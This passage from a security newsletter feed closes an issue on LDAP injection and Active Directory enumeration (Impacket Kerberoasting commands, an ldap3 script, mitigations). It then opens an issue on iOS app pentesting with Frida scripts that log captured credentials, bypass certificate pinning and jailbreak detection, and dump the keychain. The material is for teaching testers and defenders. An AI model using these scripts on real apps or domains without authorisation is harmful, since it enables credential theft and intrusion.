
Captures authentication attempts including LDAP.

**Impacket** (Python SMB/LDAP tools)
```bash
# LDAP enumeration
python3 GetADUsers.py -all example.com/user:password -dc-ip 10.10.10.10

# Kerberoasting via LDAP
python3 GetUserSPNs.py example.com/user:password -dc-ip 10.10.10.10 -request
```

### Custom Scripts

For blind LDAP injection, write custom Python scripts using `ldap3`:

```python
from ldap3 import Server, Connection, ALL

server = Server(&apos;dc.example.com&apos;, get_info=ALL)
conn = Connection(server, user=&apos;example.com\\user&apos;, password=&apos;password&apos;, auto_bind=True)

# Custom LDAP query
conn.search(&apos;DC=example,DC=com&apos;, &apos;(sAMAccountName=admin)&apos;, attributes=[&apos;description&apos;])

for entry in conn.entries:
    print(entry)
```

## 🛡️ Defense and Mitigations

LDAP injection and enumeration abuse are preventable. Here&apos;s how to defend against these attacks:

### Preventing LDAP Injection

**1. Use Parameterized Queries**

Never concatenate user input into LDAP filters. Use parameterized queries or library functions that handle escaping.

**Bad (Vulnerable):**
```php
$filter = &quot;(&amp;(objectClass=user)(uid=$username))&quot;;
```

**Good (Secure):**
```php
// Use ldap_escape() in PHP
$username = ldap_escape($_POST[&apos;username&apos;], &quot;&quot;, LDAP_ESCAPE_FILTER);
$filter = &quot;(&amp;(objectClass=user)(uid=$username))&quot;;
```

**2. Input Validation**

Restrict input to expected characters. For usernames, allow only alphanumeric and limited special characters:

```python
import re

def validate_username(username):
    if not re.match(r&apos;^[a-zA-Z0-9._-]+$&apos;, username):
        raise ValueError(&quot;Invalid username&quot;)
    return username
```

**3. Escape Special Characters**

Escape LDAP special characters: `* ( ) \ NUL`

Most LDAP libraries provide escaping functions:
- PHP: `ldap_escape()`
- Python (ldap3): Use parameterized searches
- Java: `LdapName.escapeAttributeValue()`

### Hardening LDAP Configuration

**1. Use LDAPS (LDAP over TLS)**

Always encrypt LDAP traffic to prevent credential interception:

```bash
# On Domain Controllers, reject cleartext simple binds on port 389
# and require LDAPS (636) or signed/sealed binds instead
```

**2. Require Signing and Channel Binding**

Enable LDAP signing to prevent tampering and relay attacks:

```
Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
→ Domain controller: LDAP server signing requirements → Require signing
```

**3. Restrict Anonymous LDAP Binds**

Disable anonymous access to LDAP:

```
Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options
→ Network access: Allow anonymous SID/Name translation → Disabled
```

**4. Limit LDAP Query Results**

Configure query result size limits to prevent large enumeration dumps:

```
MaxPageSize = 1000  # Limit results per query
```

### Monitoring and Detection

**1. Log LDAP Authentication Failures**

Enable Event ID 2889 (logged per client performing an unsigned or cleartext simple bind) and 2887 (periodic summary count of such binds):

```powershell
# Enable LDAP diagnostic logging
reg add &quot;HKLM\System\CurrentControlSet\Services\NTDS\Diagnostics&quot; /v &quot;16 LDAP Interface Events&quot; /t REG_DWORD /d 2
```

**2. Monitor for LDAP Enumeration**

Alert on:
- Large numbers of LDAP queries from a single source
- Queries for sensitive attributes (`adminCount`, `memberOf`, `servicePrincipalName`)
- LDAP binds from external IPs (pass-back attacks)

**3. Honeypot Accounts**

Create fake high-privilege accounts with monitoring:

```powershell
# Use a plausible description and set a strong password; attackers read the description field
New-ADUser -Name &quot;admin_backup&quot; -Description &quot;Backup admin account&quot; -AccountPassword (Read-Host -AsSecureString) -Enabled $true
```

Alert when this account is queried or authentication is attempted.

## 🧪 Labs and Practice

Here are resources to practice LDAP injection and AD enumeration:

### Vulnerable Applications

**bWAPP (Buggy Web Application)**
Includes LDAP Injection (Search) module under A1 - Injection category.
[http://www.itsecgames.com/](http://www.itsecgames.com/)

**PentesterLab LDAP Exercises**
Two dedicated exercises: LDAP 01 (NULL Bind) and LDAP 02 (Injection exploitation).
Part of the Essential Badge.
[https://pentesterlab.com/exercises/ldap_01](https://pentesterlab.com/exercises/ldap_01)
[https://pentesterlab.com/exercises/ldap_02](https://pentesterlab.com/exercises/ldap_02)

### Active Directory Labs

**HackTheBox**
Machines with LDAP enumeration and exploitation:
- **Forest** (Easy): LDAP enumeration, AS-REP Roasting
- **Sauna** (Easy): LDAP enumeration, Kerberoasting
- **Resolute** (Medium): LDAP enumeration, privilege escalation

**TryHackMe**
**LDAP Injection** room (Premium):
[https://tryhackme.com/r/room/ldapinjection](https://tryhackme.com/r/room/ldapinjection)

**Active Directory Basics** room:
[https://tryhackme.com/room/winadbasics](https://tryhackme.com/room/winadbasics)

**Attacktive Directory** room:
[https://tryhackme.com/room/attacktivedirectory](https://tryhackme.com/room/attacktivedirectory)

**HackTheBox Academy**
**Injection Attacks** course (includes LDAP injection module):
[https://academy.hackthebox.com/course/preview/injection-attacks](https://academy.hackthebox.com/course/preview/injection-attacks)

### Build Your Own Lab

Set up a local AD lab with vulnerable LDAP configurations:

**Requirements:**
- Windows Server (Domain Controller)
- Windows 10/11 (Domain-joined workstation)
- Kali Linux (Attacker machine)

**Setup steps:**

1. Install Windows Server and promote to DC
2. Create users, groups, and apply weak LDAP configurations
3. Deploy a vulnerable web app with LDAP authentication (or use DVWA)
4. Practice enumeration with `ldapsearch`, `ldapdomaindump`, `BloodHound`
5. Test LDAP injection payloads

**Automation:**

Use [GOAD (Game of Active Directory)](https://github.com/Orange-Cyberdefense/GOAD) for automated vulnerable AD lab deployment:

```bash
git clone https://github.com/Orange-Cyberdefense/GOAD
cd GOAD
vagrant up
```

This creates a multi-domain AD forest with intentional misconfigurations.

### Recommended Reading

**HackTricks - LDAP Injection**
Comprehensive guide on LDAP injection techniques and blind LDAP exploitation.
[https://book.hacktricks.xyz/pentesting-web/ldap-injection](https://book.hacktricks.xyz/pentesting-web/ldap-injection)

**HackTricks - Pentesting LDAP**
Guide on pentesting LDAP services (ports 389, 636, 3268, 3269).
[https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap](https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap)

**OWASP - LDAP Injection**
Overview of LDAP injection attacks and exploitation techniques.
[https://owasp.org/www-community/attacks/LDAP_Injection](https://owasp.org/www-community/attacks/LDAP_Injection)

**OWASP - LDAP Injection Prevention Cheat Sheet**
Best practices for preventing LDAP injection vulnerabilities.
[https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html)

**OWASP Testing Guide - LDAP Injection**
Testing methodology for identifying LDAP injection vulnerabilities.
[https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/06-Testing_for_LDAP_Injection)

**Active Directory Security Blog (ADSecurity.org)**
In-depth Active Directory security research and attack techniques.
[https://adsecurity.org/](https://adsecurity.org/)

## 🎯 Wrapping Up

LDAP injection is one of those vulnerabilities that&apos;s less talked about than SQL injection or XSS, but just as dangerous when you find it. It can lead to authentication bypass, information disclosure, and privilege escalation in one shot. And because LDAP is the backbone of Active Directory, the impact is often domain-wide.

Beyond injection, LDAP enumeration with valid credentials is a goldmine. You can map the entire domain, identify privilege escalation paths, and find high-value targets, all through legitimate LDAP queries. Pass-back attacks add another layer, turning LDAP configuration access into credential harvesting.

The key takeaways:

**For attackers:**
- Test LDAP authentication fields for injection with `*`, `)(`, and logical operators
- Use blind injection techniques when direct output isn&apos;t visible
- Enumerate AD via LDAP with tools like `ldapsearch`, `ldapdomaindump`, and `BloodHound`
- Look for pass-back opportunities in printers, apps, and network devices

**For defenders:**
- Parameterize LDAP queries and escape user input
- Use LDAPS to encrypt credentials in transit
- Restrict anonymous LDAP binds and enforce signing
- Monitor for large-scale LDAP enumeration and authentication to external IPs
- Deploy honeypot accounts to detect enumeration attempts

If you&apos;re pentesting corporate environments, LDAP should be on your checklist alongside Kerberos and NTLM attacks. It&apos;s often overlooked, which makes it a perfect target.

Next issue, we&apos;ll likely shift back to web or cloud topics. But for now, go break some directories.

Until next time,
Ruben</content:encoded><category>Newsletter</category><category>active-directory</category><author>Ruben Santos</author></item><item><title>iOS Security Testing: From IPA Analysis to Runtime Manipulation</title><link>https://www.kayssel.com/newsletter/issue-29</link><guid isPermaLink="true">https://www.kayssel.com/newsletter/issue-29</guid><description>A practical guide to iOS pentesting covering IPA decompilation, Frida hooking, certificate pinning bypass, and jailbreak detection circumvention</description><pubDate>Sun, 21 Dec 2025 09:00:00 GMT</pubDate><content:encoded>## 👋 Introduction

Hey everyone!

I&apos;ve been putting this off for too long. iOS security testing always felt like it required too much setup. You need a Mac. A jailbroken device. Xcode. Certificates. The barrier to entry seemed high compared to Android where you can spin up an emulator and start testing in minutes.

But here&apos;s the reality: you can get started with a cheap second-hand iPhone and a Linux box. Do you need a Mac? Not really. Does it make your life easier? Absolutely. But don&apos;t let the lack of a Mac stop you. Most of the work happens with cross-platform tools.

iOS apps handle sensitive data just like Android apps. Banking credentials. Authentication tokens. API keys. And while Apple&apos;s security model is more restrictive, that doesn&apos;t mean iOS apps are automatically secure. Developers still make mistakes. And those mistakes are exploitable.

What changed my perspective was realizing you don&apos;t need a fully jailbroken device to find most vulnerabilities. Static analysis of IPA files catches a surprising amount of issues. Objection (built on Frida) works on non-jailbroken devices for many common tasks. And when you do need a jailbroken device, tools like Corellium provide cloud-based virtual devices.

The attack surface is real. Apps with hardcoded API keys. Certificate pinning implementations that can be bypassed in seconds. Insecure data storage in plists and keychains. Jailbreak detection that&apos;s trivial to circumvent. The difference is iOS security testing requires understanding Apple&apos;s ecosystem and tooling.

In this issue, we&apos;ll start with iOS app structure and IPA format to understand what we&apos;re working with. Then we&apos;ll dive into static analysis techniques for decompiling IPAs and extracting secrets. From there, we&apos;ll move to dynamic analysis with Frida for runtime manipulation and hooking. You&apos;ll learn how to bypass certificate pinning to intercept HTTPS traffic, circumvent jailbreak detection, and understand keychain security. We&apos;ll wrap up with essential tools and hands-on labs you can use to practice.

If you&apos;re already comfortable with Android pentesting but haven&apos;t touched iOS, or if you&apos;re auditing mobile apps and need to expand to iOS, this is your starting point.

Let&apos;s break some apps 👇

## 📱 iOS Security Fundamentals

Before we start breaking things, let&apos;s talk about what makes iOS different from Android. Apple&apos;s security model is more locked down, but that doesn&apos;t mean it&apos;s unbreakable.

### The iOS Security Model

Every iOS app runs in its own sandbox. Apps can&apos;t peek at other apps&apos; data or system resources without explicit permission. This isolation is enforced at the kernel level, which is both good news and bad news for pentesters.

Code signing is non-negotiable. All apps must be signed with a valid certificate. Even on jailbroken devices, unsigned code won&apos;t run without disabling signature verification first. This means you can&apos;t just patch a binary and execute it like you might on Android.

Entitlements are basically a permission manifest. Special capabilities like keychain access, push notifications, or App Groups must be declared upfront in the app&apos;s entitlements plist. This gives you a quick way to see what sensitive APIs an app can touch.

Apple also throws in ASLR (Address Space Layout Randomization) and stack canaries by default. Memory addresses get randomized, and buffer overflow protection is baked in. This makes memory corruption exploits harder to pull off, though not impossible.

Here&apos;s what this means for you as a pentester. Sandboxing limits lateral movement between apps. You can&apos;t easily pivot after initial compromise. Code signing means you can&apos;t just patch and rerun without resigning the whole thing. But entitlements tell you exactly what sensitive APIs the app can access, giving you a roadmap of potential attack surfaces.

### Understanding IPA Files

Here&apos;s something that might surprise you: an IPA (iOS App Store Package) is just a ZIP file. Seriously. Rename it to .zip and you can unpack it with any archive tool.

**Structure**:
```
MyApp.ipa
└── Payload/
    └── MyApp.app/
        ├── MyApp (Mach-O binary)
        ├── Info.plist (app metadata)
        ├── embedded.mobileprovision (signing info)
        ├── Frameworks/ (bundled frameworks)
        ├── Assets.car (compiled assets)
        └── [various resource files]
```

**Key files to examine:**

**MyApp** (Mach-O binary): The actual compiled executable. This is what you decompile and analyze.

**Info.plist**: App configuration, bundle identifier, URL schemes, required device capabilities.

**embedded.mobileprovision**: Provisioning profile with entitlements and signing certificates.

**Frameworks/**: Third-party libraries (often where vulnerabilities hide).

### Objective-C vs Swift

iOS apps are written in Objective-C, Swift, or a mix of both.

Objective-C is a reverse engineer&apos;s dream. It has a dynamic runtime that&apos;s easy to hook and manipulate. Class and method names are preserved right there in the binary. You can literally see what the code is doing.

Swift is different. It compiles to LLVM IR then native code with aggressive name mangling. Method names turn into cryptic strings like `_T04MyApp13LoginViewModelC5loginyyF`. Annoying? Yes. Impossible to reverse? Not at all. You just need the right tools and a bit more patience.

Most production apps are a mix of both. Legacy code stays in Objective-C while new features get written in Swift. This is actually good for you because it gives you multiple attack surfaces to explore. Some parts are easy to reverse, others take more work.

## 🔍 Static Analysis: Decompiling IPA Files

Static analysis is where you find the low-hanging fruit. I&apos;m talking hardcoded API keys, insecure storage, vulnerable dependencies. The stuff developers hoped you&apos;d never look for.

### Obtaining IPA Files

First problem: apps from the App Store are encrypted with FairPlay DRM. You can&apos;t just download them and start analyzing. You need to decrypt them first.

**Method 1: Decrypt from Jailbroken Device**

This is the most reliable way. If you have a jailbroken device, you can dump decrypted IPAs directly from memory while the app is running.

Tools:
- **[frida-ios-dump](https://github.com/AloneMonkey/frida-ios-dump)**: Dumps decrypted IPAs from a running app
- **[Clutch](https://github.com/KJCracks/Clutch)**: Decrypts and dumps App Store apps
- **[bfinject](https://github.com/BishopFox/bfinject)**: Decrypts apps and extracts IPAs

Example with frida-ios-dump:
```bash
# Install on jailbroken device
git clone https://github.com/AloneMonkey/frida-ios-dump
cd frida-ios-dump
pip3 install -r requirements.txt

# Dump app (device must have frida-server running)
python3 dump.py -l  # List apps
python3 dump.py com.example.targetapp
```

**Method 2: Extract from Xcode Simulator** (for development builds)

```bash
# Find the app bundle
xcrun simctl list devices
xcrun simctl get_app_container booted com.example.app

# Repackage into the Payload/ layout an IPA expects
mkdir Payload
cp -r /path/to/app/container/MyApp.app Payload/
zip -r MyApp.ipa Payload
```

**Method 3: Download from Third-Party Sources**

Sites like [iOSGods](https://iosgods.com/) or [AppDB](https://appdb.to/) host decrypted IPAs. This is the quickest option but also the sketchiest. You&apos;re trusting someone else&apos;s decrypt, and you have no idea if they modified the binary. Use with caution, and never test production apps this way.

### Analyzing the Binary

Once you have the IPA, extract it:

```bash
unzip MyApp.ipa
cd Payload/MyApp.app
```

**Check binary type**:
```bash
file MyApp
# Output: Mach-O 64-bit executable arm64
```

**List classes and methods** (Objective-C):
```bash
# Install class-dump
brew install class-dump

# Dump class headers
class-dump MyApp &gt; headers.txt
```

Example output:
```objc
@interface LoginViewController : UIViewController
- (void)loginButtonTapped:(id)arg1;
- (void)storeCredentials:(NSString *)username password:(NSString *)password;
@end
```

Now you know the app has a `LoginViewController` with methods for login and credential storage. That&apos;s your target. Time to see what it&apos;s actually doing.

**For Swift binaries**, use [dsdump](https://github.com/DerekSelander/dsdump):
```bash
dsdump MyApp &gt; swift_headers.txt
```

### Decompiling with Ghidra, Hopper, or radare2

**Ghidra** is free and powerful. Download it from ghidra-sre.org, import your binary, run auto-analysis, and start exploring. It handles Mach-O files just fine, though the interface takes some getting used to.

**Hopper Disassembler** costs $99 but it&apos;s worth it if you&apos;re doing this regularly. It&apos;s specifically optimized for ARM and Mach-O binaries, generates cleaner pseudo-code than Ghidra, and has an integrated debugger. The workflow is smoother and you&apos;ll save time in the long run.

**radare2** (or its fork **rizin**) is the command-line option. Steep learning curve, but incredibly powerful once you get the hang of it. It&apos;s cross-platform, handles Mach-O binaries natively, and has excellent scripting capabilities. The visual mode (`V` command) gives you a TUI for disassembly and debugging. If you&apos;re comfortable with the terminal, r2 can do everything Ghidra does and more.

When analyzing the decompiled code, look for hardcoded API keys, tokens, and secrets that developers thought would be safe in compiled code. Check for insecure cryptographic implementations like hardcoded IVs or weak encryption modes. Identify URL endpoints to map out the backend API. Find certificate pinning logic so you know what you&apos;ll need to bypass. Locate jailbreak detection code you&apos;ll want to circumvent. And watch for debug logging that leaks sensitive data in production builds.

### Searching for Secrets

**Extract strings**:
```bash
strings MyApp | grep -i &quot;api\|key\|token\|secret\|password&quot;
```

**Search in plists**:
```bash
find . -name &quot;*.plist&quot; -exec plutil -p {} \;
```

**Check for embedded files**:
```bash
# Look for .json, .xml, .db files
find . -type f | grep -E &quot;\.(json|xml|db|sqlite)$&quot;
```

**Automated secret scanning**:
```bash
# Use trufflehog or gitleaks on extracted IPA contents
trufflehog filesystem --directory Payload/
```

## 🔨 Dynamic Analysis with Frida

Here&apos;s where things get interesting. Frida lets you inject JavaScript into running iOS apps. You can hook functions, modify behavior, and extract data in real-time. It&apos;s like having a debugger on steroids.

### Setting Up Frida on iOS

**Requirements:**
- Jailbroken iOS device OR non-jailbroken with Corellium/third-party signing
- frida-server running on device

**Installing frida-server** (jailbroken device):
```bash
# On your computer
brew install frida-tools

# On iOS device (via SSH)
# Add Frida repo to Cydia: https://build.frida.re
# Install &quot;Frida&quot; package

# Verify frida-server is running
frida-ps -U  # List running processes on USB device
```

### Basic Frida Hooking

**List running apps**:
```bash
frida-ps -Ua  # -U for USB, -a for apps
```

**Attach to an app**:
```bash
frida -U -n &quot;Target App&quot;
```

**Hook a method** (Objective-C):
```javascript
// Hook LoginViewController&apos;s loginButtonTapped method
if (ObjC.available) {
    var LoginVC = ObjC.classes.LoginViewController;

    Interceptor.attach(LoginVC[&apos;- loginButtonTapped:&apos;].implementation, {
        onEnter: function(args) {
            console.log(&quot;[+] loginButtonTapped called&quot;);
            // args[0] = self, args[1] = selector, args[2] = first argument
        },
        onLeave: function(retval) {
            console.log(&quot;[+] loginButtonTapped finished&quot;);
        }
    });
}
```

**Hook a Swift method**:
```javascript
// Swift method names are mangled
// Use frida-trace or objection to find the real name
var swiftMethod = Module.findExportByName(null, &quot;_T04MyApp18LoginViewControllerC16loginButtonTappedyypF&quot;);

if (swiftMethod) {
    Interceptor.attach(swiftMethod, {
        onEnter: function(args) {
            console.log(&quot;[+] Swift login method called&quot;);
        }
    });
}
```

**Read function arguments**:
```javascript
// Hook storeCredentials method
var LoginVC = ObjC.classes.LoginViewController;

Interceptor.attach(LoginVC[&apos;- storeCredentials:password:&apos;].implementation, {
    onEnter: function(args) {
        var username = ObjC.Object(args[2]).toString();
        var password = ObjC.Object(args[3]).toString();
        console.log(&quot;[+] Credentials: &quot; + username + &quot; / &quot; + password);
    }
});
```

**Modify return values**:
```javascript
// Bypass jailbreak detection
var JailbreakDetector = ObjC.classes.JailbreakDetector;

Interceptor.attach(JailbreakDetector[&apos;- isJailbroken&apos;].implementation, {
    onLeave: function(retval) {
        console.log(&quot;[+] Original jailbreak check: &quot; + retval);
        retval.replace(0);  // Always return NO (false)
        console.log(&quot;[+] Bypassed jailbreak check&quot;);
    }
});
```

### Objection: Frida Made Easy

[Objection](https://github.com/sensepost/objection) is built on top of Frida and simplifies all the common tasks. Think of it as Frida with training wheels, except the training wheels are actually really good.

**Installation**:
```bash
pip3 install objection
```

**Basic usage**:
```bash
# Attach to running app
objection -g &quot;Target App&quot; explore

# Inside objection REPL:
ios hooking list classes         # List all classes
ios hooking search classes Login # Search for classes
ios hooking list class_methods LoginViewController  # List methods
ios hooking watch method &quot;-[LoginViewController loginButtonTapped:]&quot;  # Hook method
ios pasteboard monitor           # Monitor clipboard
ios keychain dump                # Dump keychain (jailbroken)
ios nsurlcredentialstorage dump  # Dump stored credentials
ios ui dump                      # Dump UI hierarchy
```

**Disable SSL pinning with one command**:
```bash
objection&gt; ios sslpinning disable
```

Yep, that&apos;s it. One command and Objection automatically hooks the most common pinning implementations. It won&apos;t catch custom implementations, but it handles NSURLSession, AFNetworking, and Alamofire out of the box.

## 🔐 Bypassing Certificate Pinning

Certificate pinning is supposed to prevent MITM attacks by validating the server&apos;s certificate against a pinned cert or public key. Great for security, annoying for pentesting. You need to bypass it to intercept HTTPS traffic with Burp or mitmproxy.

The good news? Most pinning implementations are easy to defeat.

### Understanding iOS Pinning Implementations

**1. NSURLSession Pinning** (native iOS):
```objc
// App code checks certificate in delegate method
- (void)URLSession:(NSURLSession *)session
didReceiveChallenge:(NSURLAuthenticationChallenge *)challenge
completionHandler:(void (^)(NSURLSessionAuthChallengeDisposition, NSURLCredential *))completionHandler {
    // Pinning logic here
}
```

**2. AFNetworking / Alamofire** (popular libraries):
- AFNetworking (Objective-C): `AFSecurityPolicy`
- Alamofire (Swift): `ServerTrustManager`

**3. TrustKit** (open-source pinning library)

**4. Custom implementations**

### Bypass Method 1: SSL Kill Switch 2

**[SSL Kill Switch 2](https://github.com/nabla-c0d3/ssl-kill-switch2)** is a Cydia tweak that disables pinning system-wide.

**Important limitation**: SSL Kill Switch 2 only works up to iOS 14.2. If you&apos;re testing anything on iOS 15 or newer, skip this and go straight to Frida or Objection instead.

**Installation** (jailbroken device, iOS ≤ 14.2):
```bash
# Add repo to Cydia: https://cydia.akemi.ai
# Install &quot;SSL Kill Switch 2&quot;
# Enable in Settings app
```

Relaunch the app. All pinning bypassed on supported iOS versions.

### Bypass Method 2: Objection

```bash
objection -g &quot;Target App&quot; explore
objection&gt; ios sslpinning disable
```

This hooks common pinning methods at runtime.

### Bypass Method 3: Frida Script

Manual Frida script for NSURLSession pinning bypass:

```javascript
if (ObjC.available) {
    // Hook the app&apos;s session delegate, not NSURLSession itself: the
    // challenge callback lives on the delegate class. &quot;SessionDelegate&quot;
    // is a placeholder; find the real class name with class-dump or
    // Objection&apos;s &quot;ios hooking search classes&quot;.
    var delegate = ObjC.classes.SessionDelegate;

    Interceptor.attach(
        delegate[&apos;- URLSession:didReceiveChallenge:completionHandler:&apos;].implementation,
        {
            onEnter: function(args) {
                console.log(&quot;[+] NSURLSession challenge intercepted&quot;);

                // args[0] = self, args[1] = selector, args[2] = session,
                // args[3] = challenge, args[4] = completionHandler block

                var challenge = new ObjC.Object(args[3]);
                var completionHandler = new ObjC.Block(args[4]);
                var credential = ObjC.classes.NSURLCredential.credentialForTrust_(
                    challenge.protectionSpace().serverTrust());

                // 1 = NSURLSessionAuthChallengeUseCredential
                completionHandler.implementation(1, credential);
            }
        }
    );
}
```

**For AFNetworking**:
```javascript
// Hook AFSecurityPolicy
var AFSecurityPolicy = ObjC.classes.AFSecurityPolicy;

if (AFSecurityPolicy) {
    Interceptor.attach(AFSecurityPolicy[&apos;- setSSLPinningMode:&apos;].implementation, {
        onEnter: function(args) {
            console.log(&quot;[+] AFNetworking pinning disabled&quot;);
            args[2] = ptr(0);  // AFSSLPinningModeNone
        }
    });
}
```

### Setting Up Burp Suite

Once pinning is bypassed, configure the device to use Burp as proxy:

**1. Install Burp CA Certificate**:
- Start Burp, go to Proxy &gt; Options
- Export CA certificate
- Email it to yourself, open on iOS device
- Settings &gt; General &gt; VPN &amp; Device Management &gt; Install Profile

**2. Trust the certificate**:
- Settings &gt; General &gt; About &gt; Certificate Trust Settings
- Enable &quot;PortSwigger CA&quot;

**3. Configure proxy**:
- Settings &gt; Wi-Fi &gt; [Your Network] &gt; Configure Proxy &gt; Manual
- Server: [Your Computer&apos;s IP]
- Port: 8080

Now all HTTP(S) traffic flows through Burp.

## 🚫 Bypassing Jailbreak Detection

Banking apps, DRM apps, and other security-conscious software often detect jailbreak and refuse to run. They&apos;re trying to protect themselves, but these checks are almost always bypassable.

Here are the common detection methods you&apos;ll encounter:

### Detection Techniques

**1. File System Checks**:
```objc
// Check for jailbreak files
if ([[NSFileManager defaultManager] fileExistsAtPath:@&quot;/Applications/Cydia.app&quot;]) {
    // Jailbroken
}
```

**2. URL Scheme Tests**:
```objc
if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@&quot;cydia://&quot;]]) {
    // Jailbroken
}
```

**3. Sandbox Violation Tests**:
```objc
// Try to write outside the sandbox; check the method&apos;s return value
NSError *error = nil;
BOOL ok = [@&quot;test&quot; writeToFile:@&quot;/private/test.txt&quot; atomically:YES encoding:NSUTF8StringEncoding error:&amp;error];
if (ok) {
    // Jailbroken (sandbox escaped)
}
```

**4. Library Injection Detection**:
```objc
// Check for suspicious loaded libraries
uint32_t count = _dyld_image_count();
for (uint32_t i = 0; i &lt; count; i++) {
    const char *name = _dyld_get_image_name(i);
    if (strstr(name, &quot;Substrate&quot;) || strstr(name, &quot;Substitute&quot;)) {
        // Jailbreak detected
    }
}
```

**5. Root Privilege Tests**:
```objc
if (getuid() == 0) {
    // Running as root (jailbroken)
}
```

### Bypass with Frida

**Generic bypass script**:
```javascript
if (ObjC.available) {
    // Hook file existence checks
    var NSFileManager = ObjC.classes.NSFileManager;

    Interceptor.attach(NSFileManager[&apos;- fileExistsAtPath:&apos;].implementation, {
        onEnter: function(args) {
            var path = ObjC.Object(args[2]).toString();

            // If checking jailbreak paths, return false
            if (path.includes(&quot;Cydia&quot;) ||
                path.includes(&quot;substrate&quot;) ||
                path.includes(&quot;/bin/bash&quot;) ||
                path.includes(&quot;/etc/apt&quot;)) {
                console.log(&quot;[+] Hiding jailbreak file: &quot; + path);
                this.fake = true;
            }
        },
        onLeave: function(retval) {
            if (this.fake) {
                retval.replace(0);  // Return NO
            }
        }
    });

    // Hook URL scheme checks
    var UIApplication = ObjC.classes.UIApplication;

    Interceptor.attach(UIApplication[&apos;- canOpenURL:&apos;].implementation, {
        onEnter: function(args) {
            var url = ObjC.Object(args[2]).toString();
            if (url.includes(&quot;cydia://&quot;)) {
                console.log(&quot;[+] Hiding Cydia URL scheme&quot;);
                this.fake = true;
            }
        },
        onLeave: function(retval) {
            if (this.fake) {
                retval.replace(0);
            }
        }
    });
}
```

### Bypass with Liberty Lite

**[Liberty Lite](https://www.ios-repo-updates.com/repository/ryley-s-repo/package/com.ryleyangus.libertylite/)** is a Cydia tweak that bypasses jailbreak detection for selected apps.

**Installation**:
```bash
# Add repo to Cydia: https://ryleyangus.com/repo/
# Install &quot;Liberty Lite (Beta)&quot;
# Enable for target app in Settings
```

### Bypass with Objection

```bash
objection&gt; ios jailbreak disable
```

Another one-liner. Objection hooks the common jailbreak detection methods and neuters them. It won&apos;t catch every custom implementation, but it handles the usual suspects.

## 🔑 Keychain Overview

The iOS Keychain is where apps store sensitive data like passwords, tokens, and certificates. It&apos;s supposed to be secure, but developers often misconfigure it. That&apos;s where you come in.

**Quick check with Objection**:
```bash
objection -g &quot;Target App&quot; explore
objection&gt; ios keychain dump
```

Look for items with weak accessibility attributes like `kSecAttrAccessibleAlways` or `kSecAttrAccessibleAfterFirstUnlock`, which make keychain data accessible even when the device is locked. Check if sensitive data is stored without device-specific protection, allowing it to sync via iCloud. Watch for shared keychain groups that could leak data across multiple apps from the same developer.

For a comprehensive deep dive into iOS Keychain exploitation, vulnerability patterns, extraction techniques from backups, and Frida-based keychain dumping scripts, check out [Issue 10: Cracking the iOS Keychain](/post/issue-10).

## 🛠️ Essential Tools

**Static Analysis:**
- **[Ghidra](https://ghidra-sre.org/)**: Free NSA-developed reverse engineering tool
- **[radare2](https://rada.re/)** / **[rizin](https://rizin.re/)**: Command-line reverse engineering framework with powerful scripting
- **[Hopper Disassembler](https://www.hopperapp.com/)**: Commercial disassembler optimized for Mach-O binaries ($99)
- **[class-dump](https://github.com/nygard/class-dump)**: Extract Objective-C class headers (original repo unmaintained since 2019, use maintained forks like [0xced/class-dump](https://github.com/0xced/class-dump))
- **[dsdump](https://github.com/DerekSelander/dsdump)**: Extract Swift class information
- **[MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)**: Automated mobile security testing framework
- **[jtool2](http://www.newosxbook.com/tools/jtool.html)**: Mach-O binary analysis tool

**Dynamic Analysis:**
- **[Frida](https://frida.re/)**: Dynamic instrumentation toolkit
- **[Objection](https://github.com/sensepost/objection)**: Runtime mobile exploration (built on Frida)
- **[Cycript](http://www.cycript.org/)**: Hybrid Objective-C and JavaScript runtime
- **[Needle](https://github.com/FSecureLABS/needle)**: iOS security testing framework (deprecated but still useful)

**Jailbreaking:**
- **[checkra1n](https://checkra.in/)**: Bootrom exploit-based jailbreak for A7-A11 devices (iPhone 5s to iPhone X), iOS 12.0 - 14.8.1
- **[palera1n](https://palera.in/)**: checkm8-based jailbreak for A8-A11 devices, iOS 15.0 - 17.7+ (recommended for newer iOS versions)
- **[unc0ver](https://unc0ver.dev/)**: iOS 11.0 - 14.8 jailbreak
- **[Taurine](https://taurine.app/)**: iOS 14.0 - 14.3 jailbreak
- **[Dopamine](https://github.com/opa334/Dopamine)**: iOS 15.0 - 15.4.1 jailbreak

**Proxy &amp; MITM:**
- **[Burp Suite](https://portswigger.net/burp)**: HTTP proxy and testing suite
- **[mitmproxy](https://mitmproxy.org/)**: Interactive HTTPS proxy with Python scripting
- **[Charles Proxy](https://www.charlesproxy.com/)**: HTTP debugging proxy ($50)

**Jailbreak Detection Bypass:**
- **[SSL Kill Switch 2](https://github.com/nabla-c0d3/ssl-kill-switch2)**: Disable certificate pinning
- **[Liberty Lite](https://www.ios-repo-updates.com/repository/ryley-s-repo/package/com.ryleyangus.libertylite/)**: Bypass jailbreak detection
- **[Shadow](https://ios.jjolano.me/)**: Hide jailbreak from apps
- **[A-Bypass](https://repo.co.kr/)**: Universal jailbreak detection bypass

**Virtual Devices:**
- **[Corellium](https://www.corellium.com/)**: Cloud-based virtual iOS devices (enterprise pricing, contact for quote)
- **Xcode Simulator**: Free but limited (no jailbreak, no real device features)

## 🧪 Labs &amp; Practice

Start with **DVIA-v2** (Damn Vulnerable iOS App). It&apos;s intentionally vulnerable and covers everything we&apos;ve discussed: jailbreak detection, certificate pinning, keychain issues, local storage problems, and runtime manipulation. You can run it on the simulator or a jailbroken device. Grab it from [github.com/prateek147/DVIA-v2](https://github.com/prateek147/DVIA-v2).

